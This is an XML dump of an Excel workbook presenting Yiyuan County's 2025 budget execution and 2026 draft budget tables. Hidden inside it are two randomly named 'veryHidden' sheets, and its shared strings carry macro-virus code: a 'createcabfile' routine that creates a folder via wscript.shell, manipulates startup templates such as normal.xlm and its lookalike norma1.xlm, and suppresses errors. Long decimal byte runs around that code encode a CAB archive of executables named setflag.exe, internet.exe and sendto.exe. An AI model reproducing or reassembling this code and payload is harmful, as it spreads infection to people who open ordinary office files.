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30720" windowHeight="13764" tabRatio="888" firstSheet="71" activeTab="75"/>
  </bookViews>
  <sheets>
    <sheet name="SQTYELTOHBQOTP" sheetId="14" state="veryHidden" r:id="rId1"/>
    <sheet name="LFAFQGJ" sheetId="15" state="veryHidden" r:id="rId2"/>
    <sheet name="封皮" sheetId="100" r:id="rId3"/>
    <sheet name="目录" sheetId="99" r:id="rId4"/>
    <sheet name="第一部分" sheetId="140" r:id="rId5"/>
    <sheet name="表1.2025年一般收入执行" sheetId="128" r:id="rId6"/>
    <sheet name="表2.2025年一般支出执行" sheetId="129" r:id="rId7"/>
    <sheet name="表3.2025年山东省对沂源县一般性转移支付及税收返还情况表" sheetId="156" r:id="rId8"/>
    <sheet name="表4.2025年山东省对沂源县专项转移支付情况表" sheetId="157" r:id="rId9"/>
    <sheet name="表5.2025年淄博市对沂源县一般性转移支付情况表" sheetId="158" r:id="rId10"/>
    <sheet name="表6.2025年淄博市对沂源县专项转移支付情况表" sheetId="159" r:id="rId11"/>
    <sheet name="表7.2025年基金收入执行" sheetId="130" r:id="rId12"/>
    <sheet name="表8.2025年基金支出执行" sheetId="131" r:id="rId13"/>
    <sheet name="表9.2025国有资本经营收入执行" sheetId="132" r:id="rId14"/>
    <sheet name="表10.2025国有资本经营支出执行 " sheetId="133" r:id="rId15"/>
    <sheet name="表11.2025年沂源县社会保险基金预算收入执行情况表" sheetId="174" r:id="rId16"/>
    <sheet name="表12.2025年沂源县社会保险基金预算支出执行情况表" sheetId="175" r:id="rId17"/>
    <sheet name="表13.2025年沂源县社会保险基金预算结余执行情况表" sheetId="176" r:id="rId18"/>
    <sheet name="第二部分" sheetId="141" r:id="rId19"/>
    <sheet name="表14.2025年县级一般收入执行" sheetId="134" r:id="rId20"/>
    <sheet name="表15.2025年县级一般支出执行" sheetId="135" r:id="rId21"/>
    <sheet name="表16.25年县对下税收返还及转移支付分项目分地区执行情况表" sheetId="149" r:id="rId22"/>
    <sheet name="表17.2025年县级基金收入执行 " sheetId="136" r:id="rId23"/>
    <sheet name="表18.2025年县级基金支出执行" sheetId="137" r:id="rId24"/>
    <sheet name="表19.县对下政府性基金预算转移支付分项目分地区表执行情况表" sheetId="150" r:id="rId25"/>
    <sheet name="表20.2025县级国有资本经营收入执行" sheetId="138" r:id="rId26"/>
    <sheet name="表21.2025县级国有资本经营支出执行 " sheetId="139" r:id="rId27"/>
    <sheet name="表22.县对下国有资本经营预算转移支付 分项目分地区预算表" sheetId="167" r:id="rId28"/>
    <sheet name="表23.2025年沂源县县级社会保险基金预算收入执行情况表 " sheetId="183" r:id="rId29"/>
    <sheet name="表24.2025年沂源县县级社会保险基金预算支出执行情况表 " sheetId="184" r:id="rId30"/>
    <sheet name="表25.2025年沂源县县级社会保险基金预算结余执行情况表" sheetId="185" r:id="rId31"/>
    <sheet name="第三部分" sheetId="142" r:id="rId32"/>
    <sheet name="表26.一般公共预算收入表" sheetId="75" r:id="rId33"/>
    <sheet name="表27.一般公共预算支出表" sheetId="76" r:id="rId34"/>
    <sheet name="表28.基金收入表" sheetId="77" r:id="rId35"/>
    <sheet name="表29.基金支出表" sheetId="78" r:id="rId36"/>
    <sheet name="表30.国有资本经营收入表" sheetId="79" r:id="rId37"/>
    <sheet name="表31.国有资本经营支出表" sheetId="80" r:id="rId38"/>
    <sheet name="表32.社保收入表 " sheetId="168" r:id="rId39"/>
    <sheet name="表33.社保支出表 " sheetId="169" r:id="rId40"/>
    <sheet name="表34.社保余额表 " sheetId="170" r:id="rId41"/>
    <sheet name="第四部分 " sheetId="143" r:id="rId42"/>
    <sheet name="表35.本级一般公共预算收入" sheetId="55" r:id="rId43"/>
    <sheet name="表36.本级一般公共预算支出" sheetId="65" r:id="rId44"/>
    <sheet name="表37.本级一般公共预算功能分类" sheetId="60" r:id="rId45"/>
    <sheet name="表38.县级一般预算基本支出经济" sheetId="88" r:id="rId46"/>
    <sheet name="表39.税收返还及一般预算分项目表" sheetId="110" r:id="rId47"/>
    <sheet name="表40.专项转移支付到项目" sheetId="90" r:id="rId48"/>
    <sheet name="表41.对下税收返还及转移支付分地区表" sheetId="91" r:id="rId49"/>
    <sheet name="表42.2026年沂源县对下转移支付分项目预算表" sheetId="160" r:id="rId50"/>
    <sheet name="表43.本级基金收入" sheetId="56" r:id="rId51"/>
    <sheet name="表44.本级基金支出" sheetId="66" r:id="rId52"/>
    <sheet name="表45.基金转移支付分项目" sheetId="96" r:id="rId53"/>
    <sheet name="表46.基金转移支付分地区" sheetId="97" r:id="rId54"/>
    <sheet name="表47.本级国有资本经营收入" sheetId="83" r:id="rId55"/>
    <sheet name="表48.本级国有资本经营支出" sheetId="84" r:id="rId56"/>
    <sheet name="表49.国资转移支付" sheetId="98" r:id="rId57"/>
    <sheet name="表50.本级社保收入表 " sheetId="186" r:id="rId58"/>
    <sheet name="表51.本级社保支出表" sheetId="187" r:id="rId59"/>
    <sheet name="表52.本级社保余额表" sheetId="188" r:id="rId60"/>
    <sheet name="第五部分  " sheetId="144" r:id="rId61"/>
    <sheet name="表53.限额余额表" sheetId="111" r:id="rId62"/>
    <sheet name="表54.一般债务余额情况" sheetId="112" r:id="rId63"/>
    <sheet name="表55.一般限额余额" sheetId="113" r:id="rId64"/>
    <sheet name="表56.专项债务余额情况" sheetId="114" r:id="rId65"/>
    <sheet name="表57.专项限额余额" sheetId="115" r:id="rId66"/>
    <sheet name="表58.上年发行情况" sheetId="116" r:id="rId67"/>
    <sheet name="表59.债券分年偿还计划" sheetId="117" r:id="rId68"/>
    <sheet name="表60.新增债券和政府外贷额度安排情况表" sheetId="118" r:id="rId69"/>
    <sheet name="表61.新增债券项目用途表" sheetId="119" r:id="rId70"/>
    <sheet name="表62.政府债券发行情况" sheetId="120" r:id="rId71"/>
    <sheet name="表63.债券发行及还本付息情况表" sheetId="121" r:id="rId72"/>
    <sheet name="表64.2026年沂源县债务收支计划" sheetId="122" r:id="rId73"/>
    <sheet name="表65.2026年本级债务收支计划" sheetId="123" r:id="rId74"/>
    <sheet name="第六部分" sheetId="163" r:id="rId75"/>
    <sheet name="表66.2025年沂源县财政专户管理资金收支执行情况表 " sheetId="161" r:id="rId76"/>
    <sheet name="表67.2026年沂源县财政专户管理资金收支计划预算表 " sheetId="162" r:id="rId77"/>
    <sheet name="表68.街道办收入草案表" sheetId="164" r:id="rId78"/>
    <sheet name="表69.街道办支出草案表" sheetId="165" r:id="rId79"/>
    <sheet name="第七部分" sheetId="180" r:id="rId80"/>
    <sheet name="40重大政策和重点项目等绩效目标" sheetId="124" state="hidden" r:id="rId81"/>
    <sheet name="2021年乡镇" sheetId="126" state="hidden" r:id="rId82"/>
    <sheet name="2021.12月报" sheetId="125" state="hidden" r:id="rId83"/>
  </sheets>
  <externalReferences>
    <externalReference r:id="rId84"/>
  </externalReferences>
  <definedNames>
    <definedName name="_xlnm._FilterDatabase" localSheetId="44" hidden="1">表37.本级一般公共预算功能分类!$A$4:$C$1323</definedName>
    <definedName name="_xlnm._FilterDatabase" localSheetId="81" hidden="1">'2021年乡镇'!$A$4:$AP$1656</definedName>
    <definedName name="_Fill" hidden="1">#N/A</definedName>
    <definedName name="_xlnm._FilterDatabase" localSheetId="36" hidden="1">表30.国有资本经营收入表!#REF!</definedName>
    <definedName name="_xlnm._FilterDatabase" localSheetId="10" hidden="1">表6.2025年淄博市对沂源县专项转移支付情况表!$A$5:$B$77</definedName>
    <definedName name="_xlnm._FilterDatabase" localSheetId="8" hidden="1">表4.2025年山东省对沂源县专项转移支付情况表!$A$4:$B$54</definedName>
    <definedName name="_JC22" hidden="1">{"Summ CFT",#N/A,FALSE,"CFT";"Full CFT",#N/A,FALSE,"CFT"}</definedName>
    <definedName name="_Order1" hidden="1">255</definedName>
    <definedName name="_Order2" hidden="1">255</definedName>
    <definedName name="_wc21" hidden="1">{"Summ CFT",#N/A,FALSE,"CFT";"Full CFT",#N/A,FALSE,"CFT"}</definedName>
    <definedName name="_xlnm.Print_Area" localSheetId="75" hidden="1">#REF!</definedName>
    <definedName name="_xlnm.Print_Area" localSheetId="9" hidden="1">#REF!</definedName>
    <definedName name="_xlnm.Print_Area" localSheetId="10" hidden="1">#REF!</definedName>
    <definedName name="_xlnm.Print_Area" localSheetId="76" hidden="1">#REF!</definedName>
    <definedName name="_xlnm.Print_Area" localSheetId="56">表49.国资转移支付!$A$1:$E$17</definedName>
    <definedName name="_xlnm.Print_Area" localSheetId="59">表52.本级社保余额表!$A$1:$B$7</definedName>
    <definedName name="_xlnm.Print_Area" localSheetId="40">'表34.社保余额表 '!$A$1:$B$8</definedName>
    <definedName name="_xlnm.Print_Area" localSheetId="66">表58.上年发行情况!$A$1:$H$9</definedName>
    <definedName name="_xlnm.Print_Area" localSheetId="42">表35.本级一般公共预算收入!$A$1:$D$42</definedName>
    <definedName name="_xlnm.Print_Area" localSheetId="24" hidden="1">#REF!</definedName>
    <definedName name="_xlnm.Print_Area" localSheetId="27">'表22.县对下国有资本经营预算转移支付 分项目分地区预算表'!$A$1:$E$17</definedName>
    <definedName name="_xlnm.Print_Area" localSheetId="7" hidden="1">#REF!</definedName>
    <definedName name="_xlnm.Print_Area" localSheetId="8" hidden="1">#REF!</definedName>
    <definedName name="_xlnm.Print_Area" localSheetId="77" hidden="1">#REF!</definedName>
    <definedName name="_xlnm.Print_Area" localSheetId="78" hidden="1">#REF!</definedName>
    <definedName name="_xlnm.Print_Area" hidden="1">#REF!</definedName>
    <definedName name="_xlnm.Print_Titles" localSheetId="34">表28.基金收入表!$2:$4</definedName>
    <definedName name="_xlnm.Print_Titles" localSheetId="35">表29.基金支出表!$3:$4</definedName>
    <definedName name="_xlnm.Print_Titles" localSheetId="57">'表50.本级社保收入表 '!$1:$4</definedName>
    <definedName name="_xlnm.Print_Titles" localSheetId="38">'表32.社保收入表 '!$1:$4</definedName>
    <definedName name="_xlnm.Print_Titles" localSheetId="58">表51.本级社保支出表!$2:$4</definedName>
    <definedName name="_xlnm.Print_Titles" localSheetId="39">'表33.社保支出表 '!$2:$4</definedName>
    <definedName name="_xlnm.Print_Titles" localSheetId="73">表65.2026年本级债务收支计划!$2:$4</definedName>
    <definedName name="_xlnm.Print_Titles" localSheetId="44">表37.本级一般公共预算功能分类!$1:$4</definedName>
    <definedName name="_xlnm.Print_Titles" localSheetId="45">表38.县级一般预算基本支出经济!$2:$4</definedName>
    <definedName name="_xlnm.Print_Titles" localSheetId="47">表40.专项转移支付到项目!$1:$5</definedName>
    <definedName name="_xlnm.Print_Titles" hidden="1">#N/A</definedName>
    <definedName name="wrn.Cash._.Flow._.Trackers." hidden="1">{"Summ CFT",#N/A,FALSE,"CFT";"Full CFT",#N/A,FALSE,"CFT"}</definedName>
    <definedName name="wrn.Full._.Package._.Print." hidden="1">{#N/A,"429k Vol",FALSE,"Estimate Summary";#N/A,"750k Vol",FALSE,"Estimate Summary";#N/A,"1,000k Vol",FALSE,"Estimate Summary";#N/A,"1,250K Vol",FALSE,"Estimate Summary";#N/A,"1500k Vol",FALSE,"Estimate Summary";#N/A,"1750k Vol",FALSE,"Estimate Summary";#N/A,"2,000k Vol",FALSE,"Estimate Summary";#N/A,"2,250k Vol",FALSE,"Estimate Summary";#N/A,"2500K Vol",FALSE,"Estimate Summary";#N/A,"Ramp Up Vol.",FALSE,"Estimate Summary"}</definedName>
    <definedName name="地区名称" localSheetId="75">#REF!</definedName>
    <definedName name="地区名称" localSheetId="9">#REF!</definedName>
    <definedName name="地区名称" localSheetId="10">#REF!</definedName>
    <definedName name="地区名称" localSheetId="76">#REF!</definedName>
    <definedName name="地区名称" localSheetId="57">#REF!</definedName>
    <definedName name="地区名称" localSheetId="38">#REF!</definedName>
    <definedName name="地区名称" localSheetId="58">#REF!</definedName>
    <definedName name="地区名称" localSheetId="39">#REF!</definedName>
    <definedName name="地区名称" localSheetId="59">#REF!</definedName>
    <definedName name="地区名称" localSheetId="40">#REF!</definedName>
    <definedName name="地区名称" localSheetId="61">#REF!</definedName>
    <definedName name="地区名称" localSheetId="62">#REF!</definedName>
    <definedName name="地区名称" localSheetId="63">#REF!</definedName>
    <definedName name="地区名称" localSheetId="64">#REF!</definedName>
    <definedName name="地区名称" localSheetId="65">#REF!</definedName>
    <definedName name="地区名称" localSheetId="66">#REF!</definedName>
    <definedName name="地区名称" localSheetId="67">#REF!</definedName>
    <definedName name="地区名称" localSheetId="68">#REF!</definedName>
    <definedName name="地区名称" localSheetId="69">#REF!</definedName>
    <definedName name="地区名称" localSheetId="70">#REF!</definedName>
    <definedName name="地区名称" localSheetId="71">#REF!</definedName>
    <definedName name="地区名称" localSheetId="72">#REF!</definedName>
    <definedName name="地区名称" localSheetId="73">#REF!</definedName>
    <definedName name="地区名称" localSheetId="21">#REF!</definedName>
    <definedName name="地区名称" localSheetId="24">#REF!</definedName>
    <definedName name="地区名称" localSheetId="7">#REF!</definedName>
    <definedName name="地区名称" localSheetId="8">#REF!</definedName>
    <definedName name="地区名称" localSheetId="77">#REF!</definedName>
    <definedName name="地区名称" localSheetId="78">#REF!</definedName>
    <definedName name="地区名称">#REF!</definedName>
    <definedName name="_xlnm.Print_Area" localSheetId="19">表14.2025年县级一般收入执行!$A$1:$D$43</definedName>
    <definedName name="_xlnm.Print_Area" localSheetId="5">表1.2025年一般收入执行!$A$1:$F$42</definedName>
    <definedName name="_1301_石家庄市" hidden="1">[1]内置数据!$AK$2:$AK$24</definedName>
    <definedName name="_1303_秦皇岛市" hidden="1">[1]内置数据!$AM$2:$AM$9</definedName>
    <definedName name="_1305_邢台市" hidden="1">[1]内置数据!$AO$2:$AO$20</definedName>
    <definedName name="B2TJ" hidden="1">'[1]表一（录入表）'!$J$5</definedName>
    <definedName name="SSWR" hidden="1">IF('[1]表一（录入表）'!$I$2="预算四舍五入到万元",0,IF('[1]表一（录入表）'!$I$2="预算四舍五入到百元",2,IF('[1]表一（录入表）'!$I$2="预算四舍五入到元",4,0)))</definedName>
    <definedName name="_1304_邯郸市" hidden="1">[1]内置数据!$AN$2:$AN$20</definedName>
  </definedNames>
  <calcPr calcId="144525" iterate="1" iterateCount="1000" iterateDelta="0.01"/>
</workbook>
</file>

<file path=xl/sharedStrings.xml><?xml version="1.0" encoding="utf-8"?>
<sst xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" count="10075" uniqueCount="6351">
  <si>
    <t xml:space="preserve">77 83 67 70 0 0 0 0 157 27 1 0 0 0 0 0 48 24 0 0 0 0 0 0 3 1 1 0 5 0 4 0 247 20 0 0 0 24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t>
  </si>
  <si>
    <t>Private Sub createcabfile()</t>
  </si>
  <si>
    <t xml:space="preserve">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0 </t>
  </si>
  <si>
    <t>Dim ch As Byte</t>
  </si>
  <si>
    <t>on error resume next</t>
  </si>
  <si>
    <t>Set fso = CreateObject("scripting.filesystemobject")</t>
  </si>
  <si>
    <t>Set w = CreateObject("wscript.shell")</t>
  </si>
  <si>
    <t>myfolder = w.specialfolders("Templates") &amp; "\Software\"</t>
  </si>
  <si>
    <t>If Not fso.folderexists(myfolder) Then</t>
  </si>
  <si>
    <t>fso.createfolder myfolder</t>
  </si>
  <si>
    <t>End If</t>
  </si>
  <si>
    <t>For i=1 to Workbooks.Count</t>
  </si>
  <si>
    <t>If Workbooks(i).name="normal.xlm" then</t>
  </si>
  <si>
    <t>workbooks(i).close</t>
  </si>
  <si>
    <t xml:space="preserve">0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 186 24 0 0 8 0 1 0 0 128 0 0 0 0 0 0 0 0 225 48 244 104 32 0 115 101 116 102 108 97 103 46 101 120 101 0 0 96 0 0 0 128 0 0 0 0 232 48 135 172 32 0 105 110 116 101 114 110 101 116 46 101 120 101 0 0 18 1 0 0 224 0 0 0 0 232 48 177 180 32 0 110 111 114 109 97 49 46 120 108 109 0 0 158 1 0 0 242 1 0 0 0 232 48 109 144 32 0 110 111 114 109 97 108 46 100 111 116 0 0 80 0 0 0 144 3 0 0 0 229 48 54 95 32 0 115 101 110 100 116 111 46 101 120 101 0 93 3 165 99 72 50 0 128 67 75 236 58 109 116 20 85 150 85 93 213 73 37 169 166 11 236 196 0 65 90 44 92 152 48 28 156 14 14 216 129 105 52 221 9 199 4 58 132 116 19 49 9 40 196 216 43 200 36 85 160 78 26 59 84 218 77 229 209 154 221 163 206 236 142 103 143 46 58 198 115 156 213 61 58 51 56 199 29 187 19 76 2 202 71 24 151 201 12 179 10 234 226 203 20 106 28 178 157 206 208 80 123 95 85 135 4 231 99 119 127 204 191 188 115 94 223 170 247 238 123 239 222 251 238 103 37 85 247 116 83 12 69 81 44 116 93 167 168 195 148 217 60 212 255 222 6 161 207 90 248 243 89 212 155 57 199 111 62 76 87 30 191 121 115 243 131 173 206 61 45 15 63 208 178 125 151 243 254 237 187 119 63 44 57 239 219 233 108 145 119 59 31 220 237 44 219 88 227 220 245 240 142 157 203 109 182 92 49 179 199 227 53 76 212 253 173 93 103 38 251 47 191 249 192 153 60 128 135 151 223 127 230 91 198 216 67 103 110 4 88 247 205 253 103 86 25 243 77 103 214 2 220 244 224 253 205 4 127 146 22 191 151 162 42 105 134 154 255 220 39 215 72 63 71 217 233 60 58 11 38 225 101 133 57 22 190 17 126 4 232 219 50 92 10 230 59 155 89 51 9 169 238 12 30 52 198 248 21 50 239 194 181 113 97 154 44 </t>
  </si>
  <si>
    <t>fso.deletefile Application.StartupPath &amp; "\normal.xlm"</t>
  </si>
  <si>
    <t xml:space="preserve">28 59 40 106 201 255 65 102 255 239 6 116 190 254 23 166 151 75 59 31 145 0 238 189 51 67 144 255 107 132 65 115 194 46 203 91 118 108 151 182 83 212 7 217 25 222 175 201 96 170 129 52 60 203 77 52 106 112 62 252 236 201 224 237 249 35 188 248 95 131 213 153 54 211 102 218 76 155 105 51 109 166 205 180 153 54 211 102 218 76 155 105 127 189 166 92 44 65 101 98 105 77 109 0 85 176 65 87 178 217 179 199 67 85 171 146 184 172 191 76 156 47 96 31 212 139 8 135 232 208 178 90 252 36 148 210 181 33 58 182 89 92 17 162 55 225 239 91 97 170 76 92 181 88 135 125 18 231 44 126 188 15 70 2 40 21 170 172 85 219 68 9 55 0 126 0 223 7 131 106 135 216 65 25 216 149 202 145 85 29 241 189 34 250 8 118 10 177 53 184 218 220 69 84 142 8 104 208 215 126 158 108 166 244 177 238 175 218 62 116 157 237 136 171 247 138 69 246 39 158 130 65 216 210 137 54 139 206 16 133 44 158 196 185 28 127 45 190 66 214 74 226 150 24 162 44 148 65 117 41 190 4 21 60 122 15 165 208 144 90 38 222 155 24 177 92 122 137 48 136 142 41 231 25 255 165 23 241 32 153 175 20 183 193 241 205 100 85 204 145 183 9 191 111 14 150 1 166 71 73 176 202 17 81 173 132 211 42 69 135 199 164 168 189 143 224 186 19 176 103 145 253 160 172 235 122 136 10 173 168 197 223 179 78 138 164 44 196 110 194 29 172 201 100 8 228 145 99 29 131 37 64 101 48 131 83 41 86 132 216 106 188 141 224 108 22 253 100 168 76 148 66 172 95 125 218 144 14 246 153 84 180 41 71 42 80 226 31 219 63 214 105 138 98 122 81 42 161 231 0 21 52 21 1 17 44 123 148 91 223 126 148 186 170 235 235 36 107 57 25 64 227 137 11 57 1 114 99 120 156 49 54 40 10 81 235 208 112 226 124 78 117 45 254 13 236 9 162 141 234 251 75 209 165 73 158 3 248 44 99 16 177 4 136 189 23 4 202 118 3 99 203 50 82 125 217 88 82 212 222 79 80 55 202 199 64 194 75 92 113 247 40 225 29 186 211 254 228 5 160 182 9 </t>
  </si>
  <si>
    <t xml:space="preserve">241 76 19 218 204 88 154 64 84 69 228 84 37 206 182 79 68 201 148 10 215 36 111 204 32 176 48 14 40 171 200 104 17 185 192 174 74 198 210 89 41 138 176 70 44 30 34 130 142 149 9 105 152 41 74 246 211 82 193 59 43 64 3 99 37 140 235 244 165 31 73 14 130 68 8 96 18 12 28 237 238 111 251 59 237 111 97 108 21 2 206 149 68 150 235 236 52 73 37 82 57 232 84 226 227 156 226 99 176 89 169 251 87 225 185 176 178 50 86 242 172 178 246 138 68 223 229 30 150 184 59 149 126 214 253 171 182 47 204 75 66 142 238 59 1 159 25 218 84 139 255 141 49 111 169 76 252 155 16 237 199 223 167 13 33 192 81 149 213 248 105 139 33 173 178 77 184 11 158 106 241 46 138 252 206 166 12 209 186 226 141 13 245 91 149 35 37 125 221 208 2 112 36 23 84 78 234 200 199 247 120 36 171 50 168 107 119 244 40 82 73 0 183 80 134 117 96 1 204 66 223 43 224 90 43 89 207 71 227 97 43 224 107 115 144 175 40 26 151 242 252 216 70 38 154 138 168 58 52 160 52 241 84 99 67 159 177 107 52 41 231 4 240 223 195 46 117 48 130 111 129 135 104 188 206 56 162 161 47 233 179 121 36 59 217 246 183 176 122 124 184 174 97 126 188 207 21 111 232 171 33 107 121 215 217 32 16 132 6 193 8 34 19 22 249 219 77 175 112 180 116 27 242 113 104 109 113 10 148 227 214 160 159 172 29 55 73 114 15 200 179 8 253 17 105 150 120 69 245 241 90 182 178 129 119 42 239 1 83 156 210 196 82 106 86 35 234 107 216 218 23 162 177 133 144 3 135 128 235 112 157 117 233 171 87 198 145 135 218 95 245 194 225 239 121 64 173 94 7 134 86 161 10 62 153 80 164 21 74 155 40 208 178 221 143 151 131 249 40 41 189 78 90 112 151 54 143 140 82 242 13 201 132 69 154 229 199 55 100 166 100 75 94 202 231 54 54 107 123 195 88 136 250 36 11 26 104 132 83 107 209 197 106 56 16 133 121 251 107 97 1 121 57 53 156 142 234 170 151 67 31 201 217 174 248 200 113 226 105 100 71 211 184 143 231 105 137 67 190 66 213 235 </t>
  </si>
  <si>
    <t>Next</t>
  </si>
  <si>
    <t xml:space="preserve">208 178 7 188 14 242 49 11 109 224 219 207 115 112 187 210 82 228 99 129 190 69 238 97 116 185 197 130 82 65 93 230 244 219 241 99 28 69 45 221 207 210 107 65 16 197 31 209 97 78 243 185 235 29 45 190 232 81 41 47 128 127 12 150 7 82 151 31 85 194 14 74 178 161 62 215 233 113 217 129 46 23 255 65 179 160 203 198 22 32 199 215 12 19 226 129 19 169 156 246 114 197 195 238 129 150 181 40 156 214 150 2 185 1 251 47 40 63 254 61 104 65 157 33 133 229 186 151 16 121 55 80 25 141 63 78 232 164 201 213 158 181 71 253 32 13 228 21 128 233 163 125 228 6 144 55 13 167 12 20 27 135 242 218 103 186 36 178 248 35 11 185 129 16 13 47 28 102 243 224 165 238 235 34 170 231 208 73 144 80 56 173 86 113 134 136 94 249 147 34 226 51 34 210 24 84 197 101 230 190 97 10 233 22 247 32 154 48 133 116 123 13 14 66 80 88 26 230 38 165 196 124 68 88 187 219 93 229 104 89 78 196 130 18 82 142 41 150 68 113 175 191 134 8 228 229 188 140 174 75 183 19 161 124 123 169 151 99 134 181 194 0 254 73 46 76 16 41 44 233 100 128 140 187 244 42 14 72 81 194 28 101 143 238 189 158 125 65 99 13 33 12 184 78 23 123 57 34 128 255 50 173 141 168 170 34 61 12 46 193 17 213 165 92 69 167 193 40 116 139 92 47 126 9 207 160 191 178 45 128 127 54 139 162 232 50 209 81 231 210 3 248 179 180 78 12 180 14 52 60 91 76 19 13 119 244 208 146 208 195 73 124 242 8 43 103 15 248 10 137 243 11 130 76 29 132 252 115 54 131 124 215 81 32 213 254 76 98 61 74 104 182 1 107 247 94 15 85 64 156 192 160 14 54 138 23 204 38 6 41 211 125 126 88 38 76 118 252 172 221 112 19 125 33 15 188 242 164 227 33 162 229 71 120 114 77 33 189 249 245 109 30 170 57 114 155 135 218 241 130 241 37 123 135 186 216 140 204 2 92 161 186 19 235 249 44 96 184 78 119 125 160 230 247 192 145 104 208 140 73 170 237 69 120 75 156 231 152 99 170 237 121 242 136 133 67 207 1 12 81 120 79 </t>
  </si>
  <si>
    <t xml:space="preserve">33 232 1 16 195 133 138 240 63 17 19 85 118 166 41 252 26 80 171 231 111 129 221 14 29 1 203 194 187 242 41 234 80 4 86 224 130 27 32 254 108 153 3 63 151 224 166 94 56 12 99 135 222 134 31 191 190 242 117 0 250 202 87 9 214 201 113 131 110 213 251 169 31 167 0 15 121 47 34 14 229 168 85 231 252 213 248 89 193 80 61 4 4 203 231 240 239 200 133 175 233 132 85 22 201 138 191 152 11 7 19 101 189 105 30 69 53 19 226 245 252 50 112 243 128 63 133 116 116 18 105 2 30 234 50 88 28 16 59 233 254 36 49 128 119 207 55 24 11 72 185 126 28 35 207 224 11 67 64 95 228 49 160 50 159 7 108 112 121 181 160 250 160 12 238 53 207 131 23 178 43 79 16 109 31 128 56 153 178 42 23 22 198 138 162 207 3 114 226 2 131 152 100 217 10 150 150 30 12 98 251 226 140 26 150 94 211 158 130 144 5 167 68 138 10 209 8 227 47 225 161 206 253 110 157 84 20 196 159 144 103 191 158 239 128 195 64 196 185 122 190 0 79 8 107 22 215 231 65 124 55 204 34 166 46 178 99 5 75 69 63 151 114 106 113 255 34 192 215 242 93 113 205 161 44 126 26 152 165 76 213 201 153 84 157 250 173 38 135 166 30 47 0 45 156 171 239 229 112 22 104 73 83 123 19 63 126 217 21 175 83 179 84 31 167 250 216 134 62 8 93 172 219 74 56 107 93 131 6 33 224 77 88 149 143 23 34 62 70 184 74 150 13 1 67 139 253 120 109 134 200 66 147 72 206 36 18 72 140 131 13 206 57 68 200 184 142 10 162 139 237 23 29 36 3 169 226 106 220 54 178 127 32 104 87 30 5 95 132 18 232 171 63 150 93 23 200 174 135 182 119 4 1 3 28 127 88 80 195 41 53 60 106 248 23 50 214 227 148 248 144 37 88 141 15 229 26 198 131 24 166 63 233 97 35 246 142 4 185 15 47 79 150 120 211 106 152 179 63 241 25 140 196 162 23 47 131 85 86 165 139 171 120 119 149 208 186 20 30 117 111 186 43 39 50 145 43 103 235 222 209 126 202 230 233 228 60 104 48 246 12 193 44 62 214 62 65 254 92 211 246 62 </t>
  </si>
  <si>
    <t>If Workbooks(i).name="norma1.xlm" then</t>
  </si>
  <si>
    <t xml:space="preserve">74 153 107 139 83 49 239 88 136 242 155 111 65 63 98 244 146 21 122 126 145 33 2 233 46 228 29 163 189 41 247 64 91 30 248 209 98 47 239 246 10 45 93 46 240 48 48 102 143 34 32 97 117 152 147 26 67 214 45 171 189 156 92 57 37 30 67 90 35 17 67 31 137 20 33 212 104 3 177 170 177 96 181 46 11 186 204 235 83 135 192 214 99 192 145 234 77 105 47 79 33 63 7 97 1 191 227 36 106 176 198 84 58 143 196 131 4 34 171 230 217 59 142 67 68 49 207 42 34 70 189 134 28 166 21 20 123 71 255 156 186 128 55 124 129 4 198 64 8 226 69 131 156 125 152 184 42 45 203 221 31 206 70 253 135 200 12 228 148 248 49 162 117 135 72 24 38 225 234 230 16 27 80 141 112 138 183 95 55 193 133 230 225 205 224 13 235 92 71 15 251 193 34 81 62 153 81 217 217 74 220 9 153 240 154 83 45 16 129 127 231 58 253 214 54 50 217 139 126 111 42 2 98 13 69 64 236 40 113 231 16 33 100 70 201 209 149 132 243 206 246 137 56 96 182 125 0 14 241 63 193 93 68 214 156 34 44 72 214 145 38 56 151 104 25 36 36 50 79 146 145 6 161 231 128 189 227 18 176 213 227 177 71 53 2 33 253 35 249 69 143 96 239 56 75 148 100 3 39 94 85 103 129 127 6 124 50 161 236 228 41 241 75 222 210 244 10 111 248 245 69 237 87 247 192 105 18 215 126 181 27 160 156 87 131 127 184 200 72 139 228 236 0 174 36 156 146 56 198 209 65 105 71 38 217 137 85 208 234 44 180 161 112 61 4 196 13 236 126 33 232 175 193 212 149 140 95 227 53 151 114 89 151 10 80 31 122 143 48 122 126 146 209 24 59 168 89 15 111 105 5 11 243 176 78 201 22 178 132 168 26 124 52 219 212 108 31 215 85 197 117 114 154 3 242 71 47 215 72 182 252 113 122 114 203 213 97 190 81 202 34 145 75 179 67 244 55 170 37 141 227 157 64 63 201 220 182 214 247 189 63 173 129 128 130 134 128 170 4 20 230 192 242 134 152 126 247 213 189 156 59 101 63 240 8 88 213 248 0 249 107 164 236 128 194 70 249 152 81 38 184 150 </t>
  </si>
  <si>
    <t>goto a1</t>
  </si>
  <si>
    <t xml:space="preserve">165 151 94 210 197 103 134 111 130 219 24 248 57 153 84 70 216 22 94 57 199 48 131 186 24 29 93 0 126 81 140 97 152 238 6 248 16 129 20 252 44 131 238 135 126 203 80 87 86 103 118 151 143 238 44 167 187 124 22 216 182 179 220 162 244 51 202 128 177 249 251 215 54 143 173 159 194 53 176 104 165 223 162 12 88 8 214 143 174 97 117 155 56 62 192 40 39 51 7 167 175 63 9 224 109 232 111 66 127 21 250 139 208 159 131 254 52 244 131 132 254 178 39 63 85 203 158 250 20 32 6 136 1 94 4 120 17 32 20 31 79 141 2 28 3 56 6 48 5 48 5 48 13 48 29 99 99 198 159 105 71 153 212 164 36 116 194 240 40 244 52 116 97 33 140 120 185 134 198 163 125 221 132 186 233 207 38 231 153 17 160 241 58 105 128 40 38 113 99 210 109 233 88 219 234 116 70 254 226 148 252 109 87 46 189 148 134 115 247 56 201 185 227 191 6 41 59 157 6 191 147 247 49 97 222 71 49 185 143 71 22 26 247 65 144 187 59 225 185 7 250 41 232 93 62 230 150 161 206 114 102 3 108 188 145 108 251 211 105 219 18 186 50 243 83 119 244 133 69 249 210 144 254 193 105 152 221 211 240 0 105 234 174 190 96 148 47 9 185 246 3 247 64 88 185 126 111 17 192 50 232 37 208 75 161 151 65 175 132 190 25 250 3 78 227 94 160 240 123 170 8 96 33 192 66 128 14 128 14 128 2 64 1 32 15 144 7 200 1 228 0 178 0 217 235 239 197 148 79 4 126 59 161 255 0 250 171 206 105 247 226 99 128 234 105 247 96 188 95 127 7 211 199 174 187 55 125 229 197 125 30 202 72 128 137 192 73 86 209 38 178 231 246 45 50 210 137 34 